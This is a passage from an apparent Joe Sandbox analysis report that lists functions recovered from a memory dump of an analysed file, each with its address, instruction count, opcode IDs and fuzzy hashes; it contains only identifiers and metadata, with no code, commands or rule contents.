                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 068bd99592801700b3a9f9b0f94e2dd28ad8e48da8bcc8e7e32bb62a80cde783
                                          • Instruction ID: 0cf1192357a16408898aaeb913462e0e0816dbc8fc6451fb2d916396c14af833
                                          • Opcode Fuzzy Hash: 068bd99592801700b3a9f9b0f94e2dd28ad8e48da8bcc8e7e32bb62a80cde783
                                          • Instruction Fuzzy Hash: 4531C675A00156ABDB15DF98CC85FBEB7B9FB44784F458168E500EB248D770ED00CB94
                                          Function 0134483A Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ece0caaf195f22420f8d6e0ddf2d3857773b7002998783b0cda39501058db9b
                                          • Instruction ID: 039bb11c95fe111e56dd0fa33b8bd0340c6f7221c8059db20cf8abab0fb6a3d3
                                          • Opcode Fuzzy Hash: 6ece0caaf195f22420f8d6e0ddf2d3857773b7002998783b0cda39501058db9b
                                          • Instruction Fuzzy Hash: D2316576A4012DABCF61DF58DD84BDEBBF9AB98354F1000A5E508A7250CA30EE91DF90
                                          Function 012CEB20 Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3595e132ebc7bbc769a89e334953b08828339a096a2f0d503022dcfeaadd0d6
                                          • Instruction ID: 220e1a2bc734a91dc79eafe569afcb73fd6114765b8ca2af44f0e98ebafd323e
                                          • Opcode Fuzzy Hash: c3595e132ebc7bbc769a89e334953b08828339a096a2f0d503022dcfeaadd0d6
                                          • Instruction Fuzzy Hash: FF31B572E21215AFDB31DFA9C840ABEBBF9FF04750F014569E615D7250E2709E008BA0
                                          Function 013660B8 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 973c682fbf7da51979410b1c8560abfbe0dd2ef1d549bef90fb661feb515dacf
                                          • Instruction ID: 910ca046d8be39793d04152f0e063a83360bbcb487da0c4db75af2e64ce134d4
                                          • Opcode Fuzzy Hash: 973c682fbf7da51979410b1c8560abfbe0dd2ef1d549bef90fb661feb515dacf
                                          • Instruction Fuzzy Hash: 4831E8B1600606EFDB129FA9CC91B6ABBBDEF44798F008069E505EB345DA70DD018790
                                          Function 012A07AF Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52435e12c9d730b52da0a294011a70f2e93a531cb655e01718d02d66e3503152
                                          • Instruction ID: 59e8c1648d3fa6116e08a15e0b7ad6d90e84cb3fa8f3fe1bba78f27d7a19570e
                                          • Opcode Fuzzy Hash: 52435e12c9d730b52da0a294011a70f2e93a531cb655e01718d02d66e3503152
                                          • Instruction Fuzzy Hash: 9431E572A24712DFC712DE688880A7FBBA5AF94750F42452DFE5597310DA30EC1187ED
                                          Function 012A8550 Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c85fd8225ba478cde79195408828fadfa0aaddc89ff012d2599f9877c710302c
                                          • Instruction ID: 3b941d84cb627fa22b26c98d2b0f65009545bbdcc582cfef0905e698ccd175c9
                                          • Opcode Fuzzy Hash: c85fd8225ba478cde79195408828fadfa0aaddc89ff012d2599f9877c710302c
                                          • Instruction Fuzzy Hash: 4D317AB16193028FE721CF19C848B2BFBE5FB98704F45496DEA8897291D770E848CB91
                                          Function 012DA6C7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction ID: 3bd1e0a966e070c0ad7a25559a192e3c380c2f421977d6dc21d30df69ab134de
                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction Fuzzy Hash: 2E312CB2B10701AFE769CF6DCD41B5BBBF8AB08650F05492DA69AC3651E670E900CB60
                                          Function 012C438F Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f661f048bc7c9fad9b8281a2cfb55c39e65f04485c16f887ea5ffaa824ac81b
                                          • Instruction ID: 7bf04374740099a1ab569b0521635ef43c41cc388c8a9f0c218fbc35847ac869
                                          • Opcode Fuzzy Hash: 1f661f048bc7c9fad9b8281a2cfb55c39e65f04485c16f887ea5ffaa824ac81b
                                          • Instruction Fuzzy Hash: 4F31E471B202859FD720EFA8C891A6FBBF9EF90B44F10862DD205D7294D730D941CB50
                                          Function 0129CB7E Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction ID: 7e88fc831aff90890798acad865e5b578a8891e84f1fe755b689f86a4c2a572d
                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction Fuzzy Hash: 4321E636E6125BAADB11DBB98851BBFFBB5EF54780F0580399F59E7340E270D90087A0
                                          Function 0129C156 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 324bacb2abda25d8c03c909616fdc2754a22c60fc354268a3f4a06b02ce9c2e9
                                          • Instruction ID: cc7d67cd3544097ce8c7b923bb42f247cd1447f14ff620634dfc9891196adb92
                                          • Opcode Fuzzy Hash: 324bacb2abda25d8c03c909616fdc2754a22c60fc354268a3f4a06b02ce9c2e9
                                          • Instruction Fuzzy Hash: A43129B25102058BDB35AF5CC881BB9B7B4EF50314F54817DEB459F342DA749981CB90
                                          Function 0135C3CD Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction ID: 057d9c9984d7f3733c50255f0659e8f84d946b79a36791eb14cae303e24832c9
                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction Fuzzy Hash: 04212D7660075666CF16AB998800EBABFB8EF40B1CF40901AFE9597651E634D940C360
                                          Function 0129E420 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12bb1e163ad52fe297f9b407d2255b5cae87e4f983422051a872ea0ed385a13c
                                          • Instruction ID: 03dda7788187bc1cf3e7133f31f00b2e1024dc9af371e4a6700eb37a2d14e961
                                          • Opcode Fuzzy Hash: 12bb1e163ad52fe297f9b407d2255b5cae87e4f983422051a872ea0ed385a13c
                                          • Instruction Fuzzy Hash: 4C31D631A2011D9BDF31DB1CDC81FEE77B9EB15740F0200A1E655A7290D6B4AE808FA0
                                          Function 012D4588 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction ID: 61d3eb8425a60fccc47198940bec9f48e2e19cf402a9a4706c73f3d0d1781d0a
                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction Fuzzy Hash: 57219171A10649EFCB11DF58C980A9EBBB5FF48714F108065FE169F681D670EA058B90
                                          Function 012D44B0 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccbb72fe269c773b3186a0d5de8b71366820b57f7948b29e2d8587bb64d99135
                                          • Instruction ID: 904f6bf607040109e7b45d29f849808ff764b1e5a16312d49a022197b5347eff
                                          • Opcode Fuzzy Hash: ccbb72fe269c773b3186a0d5de8b71366820b57f7948b29e2d8587bb64d99135
                                          • Instruction Fuzzy Hash: 4521C3726247869BCB21EF18D880F6B77E4FB98760F404519FE559BA45D730E900CFA2
                                          Function 0129E388 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction ID: 60319fdbbae904d3c6143e0c6a24ea1eaab62c7ec90c473952b574d7f5ec14c6
                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction Fuzzy Hash: F8319A31620605EFEB21CFA8C884F6AB7F9FF45354F1549A9E6528B290E770EE01CB50
                                          Function 0131E609 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89c95f2f7c071c6588221a74f884a078642e00add27875d1ac0f39733a7205c7
                                          • Instruction ID: 0bfe755b867eb43b033b6d8dd7e93583f544a26e4dc57eec96ac64a6b15fe035
                                          • Opcode Fuzzy Hash: 89c95f2f7c071c6588221a74f884a078642e00add27875d1ac0f39733a7205c7
                                          • Instruction Fuzzy Hash: D0319F75A10205DFCB19CF1CC8849AEB7B5FF84328B554969EC099B395E732EA50CB90
                                          Function 013206F1 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6792ca315700078e04c5a88999ba5abd8bdd3ca22cab6b069f169c6c65972efd
                                          • Instruction ID: d2064143d9b630e9f05b23467eab3b8407a7c9328fe26d008dcc4261dc10cc6d
                                          • Opcode Fuzzy Hash: 6792ca315700078e04c5a88999ba5abd8bdd3ca22cab6b069f169c6c65972efd
                                          • Instruction Fuzzy Hash: 0C218D71910229ABCF25EF59C881ABEB7F8FF48744F540069F941AB250D738AD52CBA0
                                          Function 0132019F Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d00284c83c34aef34c4d84bc8d23dcea0d9612fc51342db165881a15e2ecb2b8
                                          • Instruction ID: 62f81c0681f387a835f339a244feb781b1d7e1f06f1e84e871a17ccca2f29487
                                          • Opcode Fuzzy Hash: d00284c83c34aef34c4d84bc8d23dcea0d9612fc51342db165881a15e2ecb2b8
                                          • Instruction Fuzzy Hash: CD219C71610655AFD715EFACC884F6AB7B8FF48784F14006AF944DB6A0D634ED40CB64
                                          Function 01320283 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e7b00789fd5f77ddde46070dd385dbba2609c8a71673bce28912875155c4530
                                          • Instruction ID: bb0a658faed180d279d44a28c8295ad2fbdd8cc1abb0c15350b552096b58edd2
                                          • Opcode Fuzzy Hash: 7e7b00789fd5f77ddde46070dd385dbba2609c8a71673bce28912875155c4530
                                          • Instruction Fuzzy Hash: 5B21D3725043569FD716FF99C884BABBBECAF91648F080456FE80C7251D730C908C7A1
                                          Function 012C2835 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a2a769577d97f6a0cd25a9d4319a2c21c0540f25ded1902052303b7636149a72
                                          • Instruction ID: a207b14f526e0d0f6e43f899be064d5c6420e54ac9871f4c72ab0cdc09c90609
                                          • Opcode Fuzzy Hash: a2a769577d97f6a0cd25a9d4319a2c21c0540f25ded1902052303b7636149a72
                                          • Instruction Fuzzy Hash: 79210731624782DBF323972CDC64B253BD4AB41F68F280364FB609B6E2DB68C8018220
                                          Function 012DA30B Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 712e778ce7d26a4bec4811d8e21686b4a96ac3df255f25e644eb1b899cea8cf4
                                          • Instruction ID: 3936b3536329478ffbcc305e5545c185ab8332ddb3fe5d2e122412a7ef02e183
                                          • Opcode Fuzzy Hash: 712e778ce7d26a4bec4811d8e21686b4a96ac3df255f25e644eb1b899cea8cf4
                                          • Instruction Fuzzy Hash: AD21CC75211601DFCB29DF69C841B5677F6BF08748F148468E509CB721E771E842CB94
                                          Function 0135A49A Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26fc4731535e238c6e060eea04d40308402153617338c215c468706bd9d79229
                                          • Instruction ID: 91b35a107688551b715acc65f0e053638ef9043ba6a6f1ad1923e45899536153
                                          • Opcode Fuzzy Hash: 26fc4731535e238c6e060eea04d40308402153617338c215c468706bd9d79229
                                          • Instruction Fuzzy Hash: 6C113672390A11FFE3625A59AC00F27BA99DBD4F68F510629BF48DB280EB70DC009795
                                          Function 01320946 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e10b9fc46bb7cfbff23bfbe65719a1a2a4eb4fb4c622d19566079ddcefe934d
                                          • Instruction ID: 1839694f06507a456fbb269e67d9fbc417cead2e09c3737ebe8398e46c39be59
                                          • Opcode Fuzzy Hash: 7e10b9fc46bb7cfbff23bfbe65719a1a2a4eb4fb4c622d19566079ddcefe934d
                                          • Instruction Fuzzy Hash: E42148B1E10218ABCB24DFAAD880AAEFBF8FF98704F10012FE405A7254D7709945CF60
                                          Function 013380A8 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                          • Instruction ID: 54ccc5abbaa12f4dbc1b68933aa9d021fd6fd489bee42c707db2e169ab8a7c4b
                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                          • Instruction Fuzzy Hash: A1218C72A0020AEFDF129F98CC40BAEBBB9EF88354F204459F914A7251D774D9508B54
                                          Function 012D0124 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction ID: 33c6944e7e8b18e584a9bf4821715e345076923fd16ef156e68ccf8e12d15967
                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction Fuzzy Hash: 2A11B272611606AFD7229F58DC41FAABBB8EB81754F104029F7049B190D671ED44DB68
                                          Function 012A8770 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cb1fd13b62e9485ae1855c2add51ea618e27fc81386e472a3632aacda334f251
                                          • Instruction ID: ba8fca8888e80828049a74c5cf11b73f6bfa9048368a564d1cfd2254f4f6bb86
                                          • Opcode Fuzzy Hash: cb1fd13b62e9485ae1855c2add51ea618e27fc81386e472a3632aacda334f251
                                          • Instruction Fuzzy Hash: 6611E23A7216129BDB15CF4DC880A26BFE9AF4A711B98406DEE088F200D6B2D901CB90
                                          Function 012A80E9 Relevance: .1, Instructions: 66COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 58193dbd6239a8564bcea3fef953d5eacac069f316da731da6b85e3bfe3d7127
                                          • Instruction ID: dbc3a64b47302d874a3f5fc1cb50911b495700cafd78784f11f0719f13929719
                                          • Opcode Fuzzy Hash: 58193dbd6239a8564bcea3fef953d5eacac069f316da731da6b85e3bfe3d7127
                                          • Instruction Fuzzy Hash: 33215B75A10206DFCB14CF98C581AAEBBB5FB88319F64416DD205AB311CB71BD06CBD0
                                          Function 012D674D Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e5a0927a58fd8e9451d7c22dc7e7a011e423de20e933eda47f5013bf6e48eaa6
                                          • Instruction ID: d87ddb484edf7dab39b498a3191730739fa176f3cd15a2cb1b4a3870ed311d06
                                          • Opcode Fuzzy Hash: e5a0927a58fd8e9451d7c22dc7e7a011e423de20e933eda47f5013bf6e48eaa6
                                          • Instruction Fuzzy Hash: 76215C75624A01EFE7258F69C881B66B7E8FF44350F54882DE5AAC7250DA71A850CBA0
                                          Function 01336870 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 790d2e12a574c4236d5b76d6c809e1022d248941f2bda8d624d6fdaa182896a1
                                          • Instruction ID: 0f9e0cc51c864fd30f1dc402ae2d7935ba510553b901e9197d3046fbf0b8c80c
                                          • Opcode Fuzzy Hash: 790d2e12a574c4236d5b76d6c809e1022d248941f2bda8d624d6fdaa182896a1
                                          • Instruction Fuzzy Hash: 9911E7B2240904FFC722CB5DC941F9A7BACEF99754F014025F205DF251D674EA01C7A4
                                          Function 012CE8C0 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17ae58fc24679b757dc7b69da699aa506bed065aeaa1ca73ec006d772b366dd0
                                          • Instruction ID: 7465b785be360c1ea0f835100e77fe23ee2a9eaeb2e033ac746235e58417d20e
                                          • Opcode Fuzzy Hash: 17ae58fc24679b757dc7b69da699aa506bed065aeaa1ca73ec006d772b366dd0
                                          • Instruction Fuzzy Hash: 25114C773101149BCF1ADB28CC92A7F765AEBD5774B25452DD6228B281D9309802C390
                                          Function 012D66B0 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c0df4337d836ffcfc02ee61df2868572791c5cf11546776f306173c6ca339fa
                                          • Instruction ID: c5266d3af4989208a72ca6d083faf21817e500f7361a0a1cb6380ffb4b22e907
                                          • Opcode Fuzzy Hash: 1c0df4337d836ffcfc02ee61df2868572791c5cf11546776f306173c6ca339fa
                                          • Instruction Fuzzy Hash: E411E3B6A2120ADFDB29CF59D580E5ABBF8EF94750F068079DA059B314E674DD00CB90
                                          Function 0136A8E4 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                          • Instruction ID: 520444c6743b9b0227668e7a4902f9aa6ce2bf741ea4769aace3f6a9b5ae7b4a
                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                          • Instruction Fuzzy Hash: 1211E236A00909AFDB19CB58C805B9DFBF9EF84214F158269E845A7344E671AD51CB80
                                          Function 0132E7E1 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                          • Instruction ID: f5a95703b73332f3942ec708a2d8644d5cdc1c585a62ccf7ec51742f58ab6642
                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                          • Instruction Fuzzy Hash: 52110631600614EFEB21AF49CC42B667FE5EF41B58F068438EA989B160D7B0DC40DB90
                                          Function 012C27ED Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 214895d9386191c639adf126ede1323afe9ecba6535eb66559bf6861044266ce
                                          • Instruction ID: 1640e61302a5e9deb3b2ec0db5b1e05d9c32976812a4731a8dcde8591918ae8b
                                          • Opcode Fuzzy Hash: 214895d9386191c639adf126ede1323afe9ecba6535eb66559bf6861044266ce
                                          • Instruction Fuzzy Hash: 2D012631225646AFE317A66DECA4F677BCCEF40B98F050178FA008B290D964DC00C271
                                          Function 012A4690 Relevance: .1, Instructions: 57COMMON
